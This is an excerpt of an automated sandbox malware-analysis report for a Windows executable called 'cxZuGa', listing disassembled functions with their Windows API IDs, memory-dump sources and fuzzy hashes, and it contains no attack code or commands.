                                                            Function 00007FF7EC162D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EC162D60
                                                              • Part of subcall function 00007FF7EC15B184: GetCurrentProcess.KERNEL32(00007FF7EC15B21D), ref: 00007FF7EC15B1B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *$.$.
                                                            • API String ID: 2518042432-2112782162
                                                            • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                            • Instruction ID: 95cb598f9a9aecceaa7c1afb2234178cfc3fdb2dcd3be8a64d756ca0689c1a6b
                                                            • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                            • Instruction Fuzzy Hash: 1D51B1A6F14A5585FB10EBA6E8402BDB7A4BB44BC8F944536DE4D17B85DE38D042C322
                                                            Function 00007FF7EC1584C0 Relevance: 7.1, APIs: 4, Instructions: 1071COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1286766494-0
                                                            • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                            • Instruction ID: 104069fb7045d926dc6eae154bef4b214c1774b7aa5aa94cafde1a8c2263c8cc
                                                            • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                            • Instruction Fuzzy Hash: 93A2C2BAA087428AE724AF28F4502BDB7A1FB45788F944136DB4D07B98DF3DD511C722
                                                            Function 00007FF7EC19D750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2163645468-3733053543
                                                            • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                            • Instruction ID: 5af5ad411058d941f2ed9f23691e97d758be30aaf85b2bd85bbc7f6aae747ef9
                                                            • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                            • Instruction Fuzzy Hash: DC11C477B1860282E724FB29F4402BEE262BF80754F844137E54D83A99EF3CD805C751
                                                            Function 00007FF7EC145BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7EC145C43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 389471666-631824599
                                                            • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                            • Instruction ID: abde9d8c2e397f0181babc4b3823ca22df5b826360215dbc7ed18d9852788388
                                                            • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                            • Instruction Fuzzy Hash: 6B11737AA14B4297F704EB22E6543B9B3A4FF44346F804136D64D46A54EF3CE0B4C722
                                                            Function 00007FF7EC126D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                            • Instruction ID: 662c3cf0e4f62d7c2b1d842c399c9208caf4e9e9b12df734fb0ee2223aaf6343
                                                            • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                            • Instruction Fuzzy Hash: ACE0EDA9905B0A92EF19AB10F4553A867E4FB08B8AF940436C95D453A8EF7CD5A4C321
                                                            Function 00007FF7EC132E30 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1264COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 1385522511-109567571
                                                            • Opcode ID: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                            • Instruction ID: af82d100fd591a3697d2597dc5dddcbfc444011953d1d3ad0edeb4bc4612444b
                                                            • Opcode Fuzzy Hash: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                            • Instruction Fuzzy Hash: 64C2C4BAA0868286EB64EF19E4413B9B3A1FB44B88FD54133DA4D47795DF3CE841C316
                                                            Function 00007FF7EC1B6320 Relevance: 6.3, APIs: 4, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 2733932498-0
                                                            • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                            • Instruction ID: e9b2ac2f2ed95c786d86291e14d16cfd07c0c6be0355998a5dafa9e94fdac900
                                                            • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                            • Instruction Fuzzy Hash: 22B16CAAB04B56C5EB14AF26E4907ADA7A0FB48FD4F859037DE0E47796CE38D440C321
                                                            Function 00007FF7EC1BEB34 Relevance: 6.2, APIs: 4, Instructions: 156processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                            • String ID:
                                                            • API String ID: 2000298826-0
                                                            • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                            • Instruction ID: a7a47c0a5ff6a1fbedbe05ba07c9cf79ddbcc7d54f7337c9dc4090742780989d
                                                            • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                            • Instruction Fuzzy Hash: B171827AA18B81C6E704EB25E4443AEB7A0FB88B88F904136EE4D07769DF7CD505C751
                                                            Function 00007FF7EC1402C4 Relevance: 5.7, Strings: 2, Instructions: 3180COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DEFINE$x
                                                            • API String ID: 0-4035502692
                                                            • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                            • Instruction ID: 82a7778eda7d9fea0ff2391e0d8cfd82eed96f187d7eaac1d26ce8144cfa9e37
                                                            • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                            • Instruction Fuzzy Hash: E553ADBBB086528AE760DF25E5407BC77A1FB04B88F918036DE495B784EF38E941C752
                                                            Function 00007FF7EC133C20 Relevance: 5.3, APIs: 3, Instructions: 832COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                            • Instruction ID: 5ae932407c885bce04e31f84ed650b56af84861e86041c39371d9835b5e577d0
                                                            • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                            • Instruction Fuzzy Hash: 0B826BBAA08A4286EB54EF19F484779A7A4FB44B88F964037DE4D47794DF3CE441C322
                                                            Function 00007FF7EC140E90 Relevance: 4.9, Strings: 3, Instructions: 1176COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $[$\
                                                            • API String ID: 0-3681541464
                                                            • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                            • Instruction ID: 9dae9cf4d0cc372f8ff68d9fdb66510204ee263b35138aca1a7698cc0f76e9b0
                                                            • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                            • Instruction Fuzzy Hash: 50B28DBBB087528AE7249F65E5407AC77B1FB04788F914136DA0D5BB88EF38E841C752
                                                            Function 00007FF7EC151750 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                            • Instruction ID: 97ef874db8f52981c3349268c2470a19a45f8ab1525e5947e674cb477b3f0bc4
                                                            • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                            • Instruction Fuzzy Hash: 31D1D8B6B1828687DB35DF19F1847AAB7A2F788784F648135DB4E57744DA3CE841CB00
                                                            Function 00007FF7EC1A6428 Relevance: 4.6, APIs: 3, Instructions: 116fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                            • Instruction ID: 1b831256d2d054437a97fee74cdef5158fc1f41f14e8f240e04b585ccf764315
                                                            • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                            • Instruction Fuzzy Hash: EC515ABA608A46C6DB14EF25E0843ACB7A0FB84BD4F944232DA5D477A5CF3CD551C721
                                                            Function 00007FF7EC18D5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                            • String ID:
                                                            • API String ID: 2278415577-0
                                                            • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                            • Instruction ID: 9f61d7d9d27f8733b3cfa0f3d607a6ea9d28f41c8344e48542177b7f21e1c0b2
                                                            • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                            • Instruction Fuzzy Hash: 18219DB6A08B8685DB04AF26F5403A9B7A1FB88B94F888436DE4D07718CF78D556C711
                                                            Function 00007FF7EC18D540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                            • Instruction ID: 1010c6d83a8234f5c932e2f0675712ee0ef9933fd75095aab7e244bf22f4b3df
                                                            • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                            • Instruction Fuzzy Hash: 250140B76247818FE7109F20E4553AA77B0F75476FF400929E64A86A98CB7DC158CF81
                                                            Function 00007FF7EC18CDC4 Relevance: 4.5, APIs: 3, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocInitializeProcess
                                                            • String ID:
                                                            • API String ID: 570334035-0
                                                            • Opcode ID: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                            • Instruction ID: 35a1c92744586d9bf82abe1518e8ad1815616d33cc1c865cebb09bf41d3a15f9
                                                            • Opcode Fuzzy Hash: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                            • Instruction Fuzzy Hash: E5F06D36A19B5282D714DB46B00021AB7A0FB88B91B988535DF8A43B18EF3CE854CB80
                                                            Function 00007FF7EC162F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                            • Instruction ID: 2c859954e260407c856bcd85a439fe80b0b57bd868c1127c37a87f44526c80f0
                                                            • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                            • Instruction Fuzzy Hash: 00312599B18A9144EB20AF66A8047B6F691FB50BE4FD48636EE9D07BC4DE3CD405C312
                                                            Function 00007FF7EC182BA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID: %.3d
                                                            • API String ID: 481472006-986655627
